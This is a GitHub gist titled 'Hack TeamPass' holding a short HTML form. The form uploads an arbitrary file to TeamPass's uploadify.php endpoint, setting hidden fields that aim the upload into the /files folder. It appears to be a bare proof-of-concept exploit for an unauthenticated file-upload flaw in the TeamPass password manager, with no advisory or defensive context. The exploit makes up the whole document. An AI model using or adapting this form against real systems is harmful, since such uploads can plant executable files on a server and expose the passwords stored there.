Skip to content

Instantly share code, notes, and snippets.

@leblanc-simon
Created March 12, 2012 10:03
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save leblanc-simon/2021004 to your computer and use it in GitHub Desktop.
Save leblanc-simon/2021004 to your computer and use it in GitHub Desktop.
Hack teampass
<html>
<head>
<title>Hack TeamPass</title>
</head>
<body>
<form action="http://teampass/includes/libraries/uploadify/uploadify.php" method="post" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<input type="hidden" name="type_upload" value="import_items_from_csv" />
<input type="hidden" name="folder" value="/files" />
<input type="submit">
</form>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment